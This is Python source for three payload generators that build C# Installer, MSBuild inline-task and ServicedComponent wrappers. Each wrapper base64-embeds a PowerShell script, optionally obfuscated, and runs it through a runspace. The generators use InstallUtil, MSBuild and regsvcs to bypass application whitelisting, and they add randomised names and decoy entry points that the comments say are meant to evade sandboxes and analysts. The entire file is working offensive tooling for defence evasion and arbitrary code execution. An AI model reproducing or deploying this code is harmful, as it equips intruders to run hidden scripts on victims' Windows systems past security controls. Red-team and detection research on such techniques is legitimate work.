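    def generate(self):
        """Build C# source for an Installer-hosted PowerShell runner.

        The PowerShell script named by the ``SCRIPT`` option (plus an optional
        ``FUNCTION`` line appended to it, optionally run through
        Invoke-Obfuscation) is base64-embedded in a C#
        ``System.Configuration.Install.Installer`` subclass.  Its ``Uninstall``
        override is the real entry point: it calls a static method that decodes
        the blob and feeds it to a ``System.Management.Automation`` runspace.
        ``Main`` is a decoy that loops on a message box.  The finished source
        is stored in ``self.payload_source_code``; nothing is returned.

        Reads ``self.cli_opts.c`` (``KEY=VALUE`` override tokens) and
        ``self.required_options`` (``{NAME: [value, ...]}``); the latter is
        updated in place with any overrides.

        Raises ``OSError`` if ``SCRIPT`` cannot be read and
        ``UnicodeEncodeError`` if the final script text contains characters
        outside Latin-1.
        """
        # --- CLI overrides -------------------------------------------------
        # ``-c`` may carry one comma- or space-separated string or several
        # bare KEY=VALUE tokens.  Split each pair on its first "=" instead of
        # ``str.strip(KEY + "=")``: strip() removes a *set of characters* from
        # both ends, so a value starting or ending with a letter of its own
        # key was silently truncated (``FUNCTION=Invoke-Foo`` -> ``nvoke-Foo``).
        # Tokens without any separator were previously ignored entirely.
        for token in self.cli_opts.c:
            for pair in token.replace(",", " ").split():
                key, sep, value = pair.partition("=")
                if sep and key in self.required_options:
                    self.required_options[key][0] = value

        with open(self.required_options["SCRIPT"][0], "r") as f:
            the_script = f.read()

        # Optional FUNCTION text goes on its own line after the script body
        # (typically the call that starts whatever the script defines).
        function = self.required_options["FUNCTION"][0]
        if function.lower() != "x":
            the_script += "\n{0}".format(function)

        # Invoke-Obfuscation pass.  Only "x" disables it; "ascii" selects the
        # ASCII encoder and every other value falls back to the binary one.
        obfuscation = self.required_options["OBFUSCATION"][0].lower()
        if obfuscation != "x":
            if obfuscation == "ascii":
                the_script = invoke_obfuscation.asciiEncode(the_script)
            else:
                the_script = invoke_obfuscation.binaryEncode(the_script)

        # Randomised identifiers for the C# skeleton.  Names the template never
        # referenced (bytearray/funcAddr/shellcode/thread handles, the 16+17
        # API-import lists) have been dropped; they were dead locals.
        className = bypass_helpers.randomString()
        classNameTwo = bypass_helpers.randomString()
        classNameThree = bypass_helpers.randomString()
        execName = bypass_helpers.randomString()
        savedStateName = bypass_helpers.randomString()

        # Required usings at the top of every payload.
        payload_code = "using System; using System.Net; using System.Linq; using System.Net.Sockets; using System.Runtime.InteropServices; using System.Threading; using System.Configuration.Install; using System.Windows.Forms;using System.Reflection; using System.Collections.ObjectModel; using System.Management.Automation; using System.Management.Automation.Runspaces; using System.Text;\n"
        payload_code += "\tpublic class {0} {{\n".format(className)
        payload_code += "\t\tpublic static void Main()\n\t\t{\n"
        # Decoy Main: an endless message-box loop meant to throw off sandbox
        # heuristics and analysts.  There is no decryption routine.
        # NB: this line is NOT a .format() template, so the doubled braces are
        # emitted literally -- a nested block, which is still valid C#.
        # TODO: add a fake decryption function that does nothing.
        payload_code += "\t\t\twhile(true)\n{{ MessageBox.Show(\"doge\"); Console.ReadLine();}}\n"
        payload_code += "\t\t}\n\t}\n\n"
        # Installer subclass: Uninstall() is the real entry point and simply
        # dispatches to the static runner method below.
        payload_code += "\t[System.ComponentModel.RunInstaller(true)]\n"
        payload_code += "\tpublic class {0} : System.Configuration.Install.Installer\n\t{{\n".format(classNameTwo)
        payload_code += "\t\tpublic override void Uninstall(System.Collections.IDictionary {0})\n\t\t{{\n".format(savedStateName)
        payload_code += "\t\t\t{0}.{1}();\n\t\t}}\n\t}}\n".format(classNameThree, execName)
        payload_code += "\n\tpublic class {0}\n\t{{".format(classNameThree)
        payload_code += "\n\t\tpublic static void {0}() {{\n".format(execName)
        # gamemaker emits extra C# at the top of the runner (presumably the
        # environment/sandbox checks) and reports how many blocks it left
        # open so they can be closed after the script-launch code.
        payload_code2, num_tabs_required = gamemaker.senecas_games(self)
        payload_code += payload_code2

        # The script is shipped base64-encoded and decoded on the target with
        # Encoding.ASCII (see the C# below), so any non-ASCII character in the
        # final script text is lost on the way; keep SCRIPT 7-bit clean.
        encodedScript = bypass_helpers.randomString()
        encodedScriptContents = base64.b64encode(bytes(the_script, 'latin-1')).decode('ascii')
        powershellCmd = bypass_helpers.randomString()
        data = bypass_helpers.randomString()
        command = bypass_helpers.randomString()
        RunPSCommand = bypass_helpers.randomString()
        cmd = bypass_helpers.randomString()
        runspace = bypass_helpers.randomString()
        scriptInvoker = bypass_helpers.randomString()
        pipeline = bypass_helpers.randomString()
        results = bypass_helpers.randomString()
        stringBuilder = bypass_helpers.randomString()
        obj = bypass_helpers.randomString()
        RunPSFile = bypass_helpers.randomString()
        script = bypass_helpers.randomString()
        ps = bypass_helpers.randomString()
        e = bypass_helpers.randomString()

        payload_code += """string {0} = "{1}";
                    string {2} = "";

                    byte[] {3} = Convert.FromBase64String({0});
                    string {4} = Encoding.ASCII.GetString({3});
                    {2} = {4};

                    try
                    {{
                        Console.Write({5}({2}));
                    }}
                    catch (Exception {6})
                    {{
                        Console.Write({6}.Message);
                    }}""".format(encodedScript, encodedScriptContents, powershellCmd, data, command, RunPSCommand, e)

        # Close the blocks gamemaker opened, innermost first.
        while num_tabs_required:
            payload_code += '\t' * num_tabs_required + '}'
            num_tabs_required -= 1

        # Runner helpers: RunPSCommand executes the script text in a fresh
        # runspace and returns its Out-String output; RunPSFile is an
        # alternative fire-and-forget invoker.
        payload_code +="""}}

                public static string {0}(string {1})
                {{

                    Runspace {2} = RunspaceFactory.CreateRunspace();
                    {2}.Open();
                    RunspaceInvoke {3} = new RunspaceInvoke({2});
                    Pipeline {4} = {2}.CreatePipeline();


                    {4}.Commands.AddScript({1});


                    {4}.Commands.Add("Out-String");
                    Collection<PSObject> {5} = {4}.Invoke();
                    {2}.Close();


                    StringBuilder {6} = new StringBuilder();
                    foreach (PSObject {7} in {5})
                    {{
                        {6}.Append({7});
                    }}
                    return {6}.ToString().Trim();
                 }}

                 public static void {8}(string {9})
                {{
                    PowerShell {10} = PowerShell.Create();
                    {10}.AddScript({9}).Invoke();
                }}""".format(RunPSCommand, cmd, runspace, scriptInvoker, pipeline, results, stringBuilder, obj, RunPSFile, script, ps)

        # Close the runner class.
        payload_code += "\n}"
        self.payload_source_code = payload_code
        return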
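    def generate(self):
        """Build an MSBuild project file that runs an embedded PowerShell script.

        The project declares an inline ``CodeTaskFactory`` task (C# class
        deriving from ``Task``) whose ``Execute`` body base64-decodes the
        ``SCRIPT`` file and runs it through a ``System.Management.Automation``
        runspace.  An optional ``FUNCTION`` call is either folded into the
        script before obfuscation, or exposed as the MSBuild ``$(FunctionName)``
        property, which the C# side appends to the decoded script unless it
        equals ``"None"``.  The finished XML is stored in
        ``self.payload_source_code``; nothing is returned.

        Reads ``self.cli_opts.c`` (``KEY=VALUE`` override tokens) and
        ``self.required_options`` (``{NAME: [value, ...]}``); the latter is
        updated in place (overrides, and ``FUNCTION`` is reset to ``"x"`` when
        obfuscation is used).

        Raises ``OSError`` if ``SCRIPT`` cannot be read and
        ``UnicodeEncodeError`` if the final script text contains characters
        outside Latin-1.
        """
        # --- CLI overrides -------------------------------------------------
        # ``-c`` may carry one comma- or space-separated string or several
        # bare KEY=VALUE tokens.  Split each pair on its first "=" instead of
        # ``str.strip(KEY + "=")``: strip() removes a *set of characters* from
        # both ends, so a value starting or ending with a letter of its own
        # key was silently truncated (``FUNCTION=Invoke-Foo`` -> ``nvoke-Foo``).
        # Tokens without any separator were previously ignored entirely.
        for token in self.cli_opts.c:
            for pair in token.replace(",", " ").split():
                key, sep, value = pair.partition("=")
                if sep and key in self.required_options:
                    self.required_options[key][0] = value

        # Randomised identifiers for the generated XML/C#.  Unused names
        # (namespace, the 12+17 API-import lists) have been dropped.
        targetName = bypass_helpers.randomString()
        className = bypass_helpers.randomString()
        FunctionName = bypass_helpers.randomString()

        with open(self.required_options["SCRIPT"][0], "r") as f:
            the_script = f.read()

        function = self.required_options["FUNCTION"][0]
        obfuscation = self.required_options["OBFUSCATION"][0].lower()

        if obfuscation != "x":
            # With obfuscation the FUNCTION call has to be part of the text
            # that gets encoded, so append it first and then clear FUNCTION so
            # the MSBuild property below is emitted as "None" and the C# runs
            # the blob verbatim.  Only "binary" and "ascii" are recognised;
            # any other value leaves the script unobfuscated.
            if function.lower() != "x":
                the_script += "\n{0}".format(function)
            if obfuscation == "binary":
                the_script = invoke_obfuscation.binaryEncode(the_script)
            elif obfuscation == "ascii":
                the_script = invoke_obfuscation.asciiEncode(the_script)
            self.required_options["FUNCTION"][0] = "x"
            function = "x"
        # The encoder runs exactly once.  Previously the FUNCTION == "x" branch
        # below re-applied it to the already-encoded script, wrapping the
        # payload twice and doubling its size for no benefit.

        if function.lower() != "x":
            header_comment = "<!-- C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\msbuild.exe SimpleTasks.csproj -->\n"
            function_property = function
        else:
            header_comment = ""
            function_property = "None"

        # MSBuild header.  $(FunctionName) is an MSBuild property: the
        # <PropertyGroup> default (FUNCTION, or "None") is substituted into the
        # C# string literal at build time and compared against "None" there.
        # TODO: Fix the awful formatting
        msbuild_header = """<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">\n{3}\t
            <PropertyGroup>
                <FunctionName Condition="'$(FunctionName)' == ''">{2}</FunctionName>
            </PropertyGroup>
            <Target Name="{0}">
                <{1} />
              </Target>
              <UsingTask
                TaskName="{1}"
                TaskFactory="CodeTaskFactory"
                AssemblyFile="C:\\Windows\\Microsoft.Net\\Framework\\v4.0.30319\\Microsoft.Build.Tasks.v4.0.dll" >
                <Task>
                    <Reference Include="System.Management.Automation" />
                <Code Type="Class" Language="cs">
                  <![CDATA[
            """.format(targetName, className, function_property, header_comment)

        # Required usings at the top of every payload, then the Task subclass.
        payload_code = "using System; using System.Net; using System.Net.Sockets; using System.Threading; using System.IO; using System.Reflection; using System.Runtime.InteropServices; using System.Collections.ObjectModel; using System.Management.Automation; using System.Management.Automation.Runspaces; using System.Text; using Microsoft.Build.Framework; using Microsoft.Build.Utilities;\n"
        payload_code += "public class %s : Task, ITask {\n" % (className)
        payload_code += "\npublic string {0} = \"$(FunctionName)\";".format(
            FunctionName)

        # gamemaker emits extra C# (presumably the environment/sandbox checks,
        # including the Execute() opening) and reports how many blocks it left
        # open so they can be closed after the script-launch code.
        payload_code2, num_tabs_required = gamemaker.senecas_games(self)
        payload_code += payload_code2

        # The script is shipped base64-encoded and decoded on the target with
        # Encoding.ASCII (see the C# below), so any non-ASCII character in the
        # final script text is lost on the way; keep SCRIPT 7-bit clean.
        encodedScript = bypass_helpers.randomString()
        encodedScriptContents = base64.b64encode(bytes(
            the_script, 'latin-1')).decode('ascii')
        powershellCmd = bypass_helpers.randomString()
        data = bypass_helpers.randomString()
        command = bypass_helpers.randomString()
        RunPSCommand = bypass_helpers.randomString()
        cmd = bypass_helpers.randomString()
        runspace = bypass_helpers.randomString()
        scriptInvoker = bypass_helpers.randomString()
        pipeline = bypass_helpers.randomString()
        results = bypass_helpers.randomString()
        stringBuilder = bypass_helpers.randomString()
        obj = bypass_helpers.randomString()
        RunPSFile = bypass_helpers.randomString()
        script = bypass_helpers.randomString()
        ps = bypass_helpers.randomString()
        e = bypass_helpers.randomString()

        payload_code += """string {0} = "{1}";
                    string {2} = "";

					if ({3} != "None")
					{{
						byte[] {4} = Convert.FromBase64String({0});
						string {5} = Encoding.ASCII.GetString({4});
						{2} = {5} + "" + {3};
					}}
                    else
                    {{
                        byte[] {4} = Convert.FromBase64String({0});
                        string {5} = Encoding.ASCII.GetString({4});
                        {2} = {5};
                    }}

					try
					{{
						Console.Write({6}({2}));
					}}
					catch (Exception {7})
					{{
						Console.Write({7}.Message);
					}}""".format(encodedScript, encodedScriptContents, powershellCmd,
                  FunctionName, data, command, RunPSCommand, e)

        # Close the blocks gamemaker opened, innermost first.
        while num_tabs_required:
            payload_code += '\t' * num_tabs_required + '}'
            num_tabs_required -= 1

        # Execute() must return true for MSBuild to treat the task as
        # successful; then the runner helpers (see Example 1 for the same
        # RunPSCommand / RunPSFile pair).
        payload_code += """return true;
				}}

				//Based on Jared Atkinson's And Justin Warner's Work
				public static string {0}(string {1})
				{{

					Runspace {2} = RunspaceFactory.CreateRunspace();
					{2}.Open();
					RunspaceInvoke {3} = new RunspaceInvoke({2});
					Pipeline {4} = {2}.CreatePipeline();


					{4}.Commands.AddScript({1});


					{4}.Commands.Add("Out-String");
					Collection<PSObject> {5} = {4}.Invoke();
					{2}.Close();


					StringBuilder {6} = new StringBuilder();
					foreach (PSObject {7} in {5})
					{{
						{6}.Append({7});
					}}
					return {6}.ToString().Trim();
				 }}

				 public static void {8}(string {9})
				{{
					PowerShell {10} = PowerShell.Create();
					{10}.AddScript({9}).Invoke();
				}}""".format(RunPSCommand, cmd, runspace, scriptInvoker, pipeline, results,
                 stringBuilder, obj, RunPSFile, script, ps)

        # Close the class, the CDATA section and the remaining XML elements.
        payload_code += "}\n\t\t\t\t]]>\n\t\t\t</Code>\n\t\t</Task>\n\t</UsingTask>\n</Project>"
        payload_code = msbuild_header + payload_code

        self.payload_source_code = payload_code
        return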
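    def generate(self):
        """Build C# source for a ServicedComponent that runs an embedded PowerShell script.

        The PowerShell script named by the ``SCRIPT`` option (plus an optional
        ``FUNCTION`` line appended to it, optionally run through
        Invoke-Obfuscation) is base64-embedded in a C# class deriving from
        ``System.EnterpriseServices.ServicedComponent``.  Both its
        ``[ComRegisterFunction]`` and ``[ComUnregisterFunction]`` hooks
        dispatch to a static method that decodes the blob and feeds it to a
        ``System.Management.Automation`` runspace, so either registering or
        unregistering the assembly runs the script.  The constructor is a decoy
        that just prints a string.  The finished source is stored in
        ``self.payload_source_code``; nothing is returned.

        Reads ``self.required_options`` (``{NAME: [value, ...]}``); unlike
        the other generators this one applies no CLI overrides.

        Raises ``OSError`` if ``SCRIPT`` cannot be read and
        ``UnicodeEncodeError`` if the final script text contains characters
        outside Latin-1.
        """
        with open(self.required_options["SCRIPT"][0], "r") as f:
            the_script = f.read()

        # Optional FUNCTION text goes on its own line after the script body
        # (typically the call that starts whatever the script defines).
        function = self.required_options["FUNCTION"][0]
        if function.lower() != "x":
            the_script += "\n{0}".format(function)

        # Invoke-Obfuscation pass.  Only "x" disables it; "ascii" selects the
        # ASCII encoder and every other value falls back to the binary one.
        obfuscation = self.required_options["OBFUSCATION"][0].lower()
        if obfuscation != "x":
            if obfuscation == "ascii":
                the_script = invoke_obfuscation.asciiEncode(the_script)
            else:
                the_script = invoke_obfuscation.binaryEncode(the_script)

        # Randomised identifiers for the C# skeleton.  Unused names (the
        # FunctionName copy and the 16+17 API-import lists) have been dropped.
        className = bypass_helpers.randomString()
        classNameTwo = bypass_helpers.randomString()
        namespace = bypass_helpers.randomString()
        key = bypass_helpers.randomString()
        execName = bypass_helpers.randomString()

        # Required usings at the top of every payload, then the namespace and
        # the ServicedComponent subclass.
        payload_code = "using System; using System.Net; using System.Net.Sockets; using System.Linq; using System.Threading; using System.EnterpriseServices; using System.Runtime.InteropServices; using System.Windows.Forms;using System.Reflection; using System.Collections.ObjectModel; using System.Management.Automation; using System.Management.Automation.Runspaces; using System.Text;\n"
        payload_code += "namespace {0}\n {{".format(namespace)
        payload_code += "\n\tpublic class {0} : ServicedComponent {{\n".format(
            className)
        # Placeholder for a legitimate-looking C# program: the constructor only
        # prints a string, to throw off sandbox heuristics and analysts.
        payload_code += '\n\t\tpublic {0}() {{ Console.WriteLine("doge"); }}\n'.format(
            className)
        # Register and unregister hooks both dispatch to the static runner.
        payload_code += "\n\t\t[ComRegisterFunction]"
        payload_code += "\n\t\tpublic static void RegisterClass ( string {0} )\n\t\t{{\n".format(
            key)
        payload_code += "\t\t\t{0}.{1}();\n\t\t}}\n".format(
            classNameTwo, execName)
        payload_code += "\n[ComUnregisterFunction]"
        payload_code += "\n\t\tpublic static void UnRegisterClass ( string {0} )\n\t\t{{\n".format(
            key)
        payload_code += "\t\t\t{0}.{1}();\n\t\t}}\n\t}}\n".format(
            classNameTwo, execName)

        payload_code += "\n\tpublic class {0}\n\t{{".format(classNameTwo)
        payload_code += "\n\t\tpublic static void {0}() {{\n".format(execName)
        # gamemaker emits extra C# at the top of the runner (presumably the
        # environment/sandbox checks) and reports how many blocks it left
        # open so they can be closed after the script-launch code.
        payload_code2, num_tabs_required = gamemaker.senecas_games(self)
        payload_code += payload_code2

        # The script is shipped base64-encoded and decoded on the target with
        # Encoding.ASCII (see the C# below), so any non-ASCII character in the
        # final script text is lost on the way; keep SCRIPT 7-bit clean.
        encodedScript = bypass_helpers.randomString()
        encodedScriptContents = base64.b64encode(bytes(
            the_script, 'latin-1')).decode('ascii')
        powershellCmd = bypass_helpers.randomString()
        data = bypass_helpers.randomString()
        command = bypass_helpers.randomString()
        RunPSCommand = bypass_helpers.randomString()
        cmd = bypass_helpers.randomString()
        runspace = bypass_helpers.randomString()
        scriptInvoker = bypass_helpers.randomString()
        pipeline = bypass_helpers.randomString()
        results = bypass_helpers.randomString()
        stringBuilder = bypass_helpers.randomString()
        obj = bypass_helpers.randomString()
        RunPSFile = bypass_helpers.randomString()
        script = bypass_helpers.randomString()
        ps = bypass_helpers.randomString()
        e = bypass_helpers.randomString()

        payload_code += """string {0} = "{1}";
                    string {2} = "";

                    byte[] {3} = Convert.FromBase64String({0});
                    string {4} = Encoding.ASCII.GetString({3});
                    {2} = {4};

                    try
                    {{
                        Console.Write({5}({2}));
                    }}
                    catch (Exception {6})
                    {{
                        Console.Write({6}.Message);
                    }}""".format(encodedScript, encodedScriptContents,
                                 powershellCmd, data, command, RunPSCommand, e)

        # Close the blocks gamemaker opened, innermost first.
        while num_tabs_required:
            payload_code += '\t' * num_tabs_required + '}'
            num_tabs_required -= 1

        # Runner helpers: RunPSCommand executes the script text in a fresh
        # runspace and returns its Out-String output; RunPSFile is an
        # alternative fire-and-forget invoker.
        payload_code += """}}

                public static string {0}(string {1})
                {{

                    Runspace {2} = RunspaceFactory.CreateRunspace();
                    {2}.Open();
                    RunspaceInvoke {3} = new RunspaceInvoke({2});
                    Pipeline {4} = {2}.CreatePipeline();


                    {4}.Commands.AddScript({1});


                    {4}.Commands.Add("Out-String");
                    Collection<PSObject> {5} = {4}.Invoke();
                    {2}.Close();


                    StringBuilder {6} = new StringBuilder();
                    foreach (PSObject {7} in {5})
                    {{
                        {6}.Append({7});
                    }}
                    return {6}.ToString().Trim();
                 }}

                 public static void {8}(string {9})
                {{
                    PowerShell {10} = PowerShell.Create();
                    {10}.AddScript({9}).Invoke();
                }}""".format(RunPSCommand, cmd, runspace, scriptInvoker,
                             pipeline, results, stringBuilder, obj, RunPSFile,
                             script, ps)

        # Close the runner class and the namespace.
        payload_code += "\n}" * 2

        self.payload_source_code = payload_code
        return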